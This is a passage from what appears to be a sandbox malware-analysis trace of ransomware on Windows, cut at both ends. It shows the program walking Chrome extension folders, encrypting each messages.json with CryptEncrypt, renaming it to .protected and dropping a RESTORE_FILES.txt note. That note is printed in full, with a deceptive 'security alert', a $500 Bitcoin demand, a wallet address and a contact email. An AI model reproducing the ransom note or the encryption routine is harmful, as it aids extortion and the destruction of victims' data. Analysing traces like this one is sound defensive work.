Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.816] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\.") returned 143 [0078.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.816] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.816] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\..") returned 144 [0078.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.816] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0078.816] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.816] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.816] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.816] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.816] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0078.817] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.817] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0078.817] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.817] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.817] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.818] CloseHandle (hObject=0x168) returned 1 [0078.818] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.protected") returned 165 [0078.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.protected")) returned 1 [0078.818] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.818] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.818] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0078.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0078.818] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.818] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.819] lstrlenA (lpString="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") returned 684 [0078.819] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.819] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.819] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.819] CloseHandle (hObject=0x164) returned 1 [0078.819] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0078.819] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0078.819] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned 141 [0078.819] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0078.820] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*") returned 143 [0078.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0078.820] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.820] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.820] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.820] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.820] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\.") returned 143 [0078.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.820] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.820] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.820] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.820] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.820] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.820] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\..") returned 144 [0078.820] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.820] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.820] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.820] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.820] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.820] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.820] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.820] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.821] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.821] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.821] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.821] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.821] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.821] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.821] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.821] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.822] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.822] CloseHandle (hObject=0x168) returned 1 [0078.822] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.protected") returned 165 [0078.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.protected")) returned 1 [0078.822] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.822] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.822] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0078.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.823] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.823] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.823] lstrlenA (lpString="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") returned 684 [0078.823] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.823] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.823] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.823] CloseHandle (hObject=0x164) returned 1 [0078.824] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0078.824] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0078.824] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned 141 [0078.824] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0078.824] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0078.824] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*") returned 143 [0078.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.825] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0078.825] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.825] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.825] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.825] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.825] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\.") returned 143 [0078.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.825] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.825] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.825] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.825] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.825] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.825] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.825] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\..") returned 144 [0078.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.825] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.825] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
